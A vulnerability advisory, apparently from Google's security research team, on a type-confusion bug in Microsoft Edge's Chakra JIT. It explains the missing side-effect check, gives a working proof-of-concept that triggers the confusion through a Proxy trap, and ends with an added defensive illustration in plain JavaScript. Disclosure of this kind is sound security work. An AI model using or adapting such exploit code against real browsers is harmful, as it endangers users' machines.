Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion
Source: Google Security Research  Author: Google  Published: 2018-06-11
/*
function opt(w, arr) {
    arr[0] = 1.1;
    let res = w.event;
    arr[0] = 2.3023e-320;
    return res;
}
 
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
    opt(window, arr);
}
 
The above code will be compiled as follows:
000001a8`8000122b 48b8503dcfd5ff7f0000 mov rax,offset chakra!DOMFastPath<7>::EntrySimpleObjectSlotGetter (00007fff`d5cf3d50)  // w.event
000001a8`80001235 48ffd0          call    rax
000001a8`80001238 488b8e30bdf0ff  mov     rcx,qword ptr [rsi-0F42D0h]
000001a8`8000123f f2480f104158    movsd   xmm0,mmword ptr [rcx+58h]
000001a8`80001245 f2490f11442418  movsd   mmword ptr [r12+18h],xmm0  // arr[0] = 2.3023e-320;
...
 
As you can see, there's no "ImplicitCallFlags" check after the call to the "EntrySimpleObjectSlotGetter" method. The code was generated on the assumption that the method has no side effects, but in fact it can have them. The method wraps the return value using "CrossSite::MarshalVar", which traverses the prototype chain of the given object via the "GetPrototype" method. Since "GetPrototype" may invoke the "getPrototypeOf" handler of a Proxy object, changing the type of the array inside that handler leads to type confusion.
 
PoC:
*/
 
function opt(w, arr) {
    arr[0] = 1.1;
    let res = w.event;
    arr[0] = 2.3023e-320;
    return res;
}
 
function main() {
    let f = document.body.appendChild(document.createElement('iframe'));
    f.contentWindow;
 
    for (let i = 0; i < 100000; i++) {
        opt(window, [1.1]);
    }
 
    let set_callback = new f.contentWindow.Function('callback', `
        window.__lookupSetter__('event').call(parent, new Proxy({}, {
            getPrototypeOf() {
                callback();
                return {};
            }
        }));`);
 
    let arr = [1.1];
    set_callback(() => {
        arr[0] = {};
    });
 
    opt(window, arr);
    alert(arr);
}
 
main();
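As an added illustration (not part of the original advisory or its PoC), the following engine-independent JavaScript models the hidden side effect the optimizer missed: a prototype-chain walk that a marshalling routine would treat as read-only can run user code once a Proxy with a getPrototypeOf trap sits on the chain, and that code can change the element kind of an array the caller assumed held only doubles. The walkPrototypeChain and demonstrate helpers are hypothetical names written for this example; no JIT is involved, only the JavaScript semantics that make the assumption unsound.

```javascript
// Added example: a pure-JS model of why a prototype-chain traversal is not
// side-effect-free. walkPrototypeChain stands in for a marshalling routine
// that inspects every object on the chain with Object.getPrototypeOf.
function walkPrototypeChain(obj) {
  const seen = [];
  let cur = obj;
  while (cur !== null) {
    seen.push(cur);
    cur = Object.getPrototypeOf(cur); // may invoke a Proxy's getPrototypeOf trap
  }
  return seen.length; // number of objects visited on the chain
}

// Builds the scenario: a double-only array, a Proxy whose getPrototypeOf trap
// mutates that array during the "read-only" walk, and a record of what changed.
function demonstrate() {
  const arr = [1.1];            // an optimizer would assume this stays double-only
  const log = [];               // constructed log of trap invocations
  const proxy = new Proxy({}, {
    getPrototypeOf() {
      log.push('trap fired');   // arbitrary user code runs here
      arr[0] = {};              // element kind changes under the caller's feet
      return null;              // end of chain (target is extensible, so null is allowed)
    }
  });
  const before = typeof arr[0];
  const depth = walkPrototypeChain(proxy);
  const after = typeof arr[0];
  return { before, after, depth, trapFired: log.length };
}
```

The point for a defender reviewing optimizer assumptions: any operation that can reach a Proxy trap (prototype lookup, property access, conversion) must be treated as a potential implicit call, which is exactly what the missing "ImplicitCallFlags" check was supposed to guarantee.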
 